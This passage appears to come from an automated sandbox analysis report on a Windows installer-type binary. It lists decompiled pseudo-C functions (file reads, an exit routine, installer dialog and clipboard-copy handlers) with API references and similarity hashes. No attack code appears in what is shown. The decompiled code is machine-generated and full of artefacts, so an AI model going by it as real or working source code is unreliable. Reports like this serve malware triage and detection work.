				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                        0x00403085
                        0x00403098
                        0x004030a0
                        0x00000000
                        0x004030a7
                        0x00000000
                        0x004030a9

                        APIs
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                        • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                        • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                        • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                        0x004030c1
                        0x004030c7

                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000081E4), ref: 004030C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                        • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                        • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                        • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10008882, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        C-Code - Quality: 25%
                        			E10008882() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E100088E9(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                        0x10008882
                        0x10008884
                        0x10008886
                        0x10008888
                        0x10008890

                        APIs
                        • _doexit.LIBCMT ref: 10008888
                          • Part of subcall function 100088E9: __lock.LIBCMT ref: 100088F7
                          • Part of subcall function 100088E9: RtlDecodePointer.NTDLL(10019340,0000001C,1000887D,?,00000001,00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008936
                          • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008947
                          • Part of subcall function 100088E9: EncodePointer.KERNEL32(00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008960
                          • Part of subcall function 100088E9: DecodePointer.KERNEL32(-00000004,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008970
                          • Part of subcall function 100088E9: EncodePointer.KERNEL32(00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008976
                          • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 1000898C
                          • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008997
                          • Part of subcall function 100088E9: __initterm.LIBCMT ref: 100089BF
                          • Part of subcall function 100088E9: __initterm.LIBCMT ref: 100089D0
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                        • String ID:
                        • API String ID: 3712619029-0
                        • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                        • Instruction ID: e6994391439ff2091fcc02a30716a5b2c18efe1f1a304855d421632494bfa426
                        • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                        • Instruction Fuzzy Hash: F3A00269BD430021F86091502C43F5825016750F41FD44050FB482C1C5E8C623585257
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x571700
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                        0x00404fcb
                        0x00404fd1
                        0x00404fda
                        0x00404fdd
                        0x0040516e
                        0x00405175
                        0x00405199
                        0x00405199
                        0x0040519f
                        0x004051ac
                        0x004051ca
                        0x004051ca
                        0x004051d1
                        0x00405228
                        0x00405228
                        0x0040522c
                        0x00000000
                        0x00000000
                        0x0040522e
                        0x00405231
                        0x00000000
                        0x00000000
                        0x0040523b
                        0x00405241
                        0x00405243
                        0x00405246
                        0x0040533f
                        0x00000000
                        0x0040533f
                        0x00405255
                        0x00405261
                        0x00405267
                        0x0040526a
                        0x0040526d
                        0x00405282
                        0x00405285
                        0x00405285
                        0x00405288
                        0x0040526f
                        0x00405274
                        0x0040527a
                        0x0040527d
                        0x0040527d
                        0x00405298
                        0x004052a0
                        0x004052a1
                        0x004052a3
                        0x004052ac
                        0x004052af
                        0x004052b6
                        0x004052bd
                        0x004052c5
                        0x004052c5
                        0x004052d3
                        0x004052d9
                        0x004052dc
                        0x004052dc
                        0x004052e3
                        0x004052e9
                        0x004052f2
                        0x004052f9
                        0x00405302
                        0x00405304
                        0x00405307
                        0x00405316
                        0x00405318
                        0x0040531e
                        0x0040531f
                        0x00405320
                        0x00405320
                        0x00405328
                        0x00405333
                        0x00405339
                        0x00405339
                        0x00000000
                        0x004052a3
                        0x004051d3
                        0x004051d9
                        0x00405209
                        0x0040520b
                        0x00405211
                        0x0040521c
                        0x0040521c
                        0x00405223
                        0x00000000
                        0x00405223
                        0x004051dd
                        0x004051e7
                        0x00000000
                        0x004051ae
                        0x004051ae
                        0x004051b4
                        0x004051ec
                        0x00000000
                        0x004051f5
                        0x004051bd
                        0x004051c2
                        0x004051c5
                        0x00000000
                        0x004051c5
                        0x004051ac
                        0x00404fe3
                        0x00404fe7
                        0x00404ff0
                        0x00404ff7
                        0x00404ffa
                        0x00404ffd
                        0x00405000
                        0x00405001
                        0x00405002
                        0x0040501b
                        0x0040501e
                        0x00405028
                        0x00405037
                        0x0040503f
                        0x00405047
                        0x0040504c
                        0x0040504f
                        0x0040505b
                        0x00405064
                        0x0040506d
                        0x00405090
                        0x00405096
                        0x004050a7
                        0x004050ac
                        0x004050ba
                        0x004050c8
                        0x004050c8
                        0x004050cd
                        0x004050db
                        0x004050db
                        0x004050e0
                        0x004050e3
                        0x004050e8
                        0x004050f4
                        0x004050fd
                        0x0040510a
                        0x00405119
                        0x0040510c
                        0x00405111
                        0x00405111
                        0x00405125
                        0x00405125
                        0x00405139
                        0x00405142
                        0x0040514b
                        0x0040515b
                        0x00405167
                        0x00405167
                        0x00000000

                        APIs
                        • GetDlgItem.USER32 ref: 00405021
                        • GetDlgItem.USER32 ref: 00405030
                        • GetClientRect.USER32 ref: 0040506D
                        • GetSystemMetrics.USER32 ref: 00405075
                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                        • ShowWindow.USER32(?,00000008), ref: 00405111
                        • GetDlgItem.USER32 ref: 00405132
                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                        • GetDlgItem.USER32 ref: 0040503F
                          • Part of subcall function 00403E89: SendMessageA.USER32(00000028,?,00000001,00403CBA), ref: 00403E97
                        • GetDlgItem.USER32 ref: 00405184
                        • CreateThread.KERNEL32 ref: 00405192
                        • CloseHandle.KERNEL32(00000000), ref: 00405199
                        • ShowWindow.USER32(00000000), ref: 004051BD
                        • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                        • ShowWindow.USER32(00000008), ref: 00405209
                        • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040523B
                        • CreatePopupMenu.USER32 ref: 0040524C
                        • AppendMenuA.USER32 ref: 00405261
                        • GetWindowRect.USER32 ref: 00405274
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                        • OpenClipboard.USER32(00000000), ref: 004052E3
                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                        • GlobalLock.KERNEL32 ref: 004052FC
                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                        • SetClipboardData.USER32 ref: 00405333
                        • CloseClipboard.USER32 ref: 00405339
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                        • String ID: {
                        • API String ID: 590372296-366298937
                        • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                        • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                        • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                        • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x5718ac
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x571700
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x3
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x5718ac
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x578476
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x5718b4
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x5718c4
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
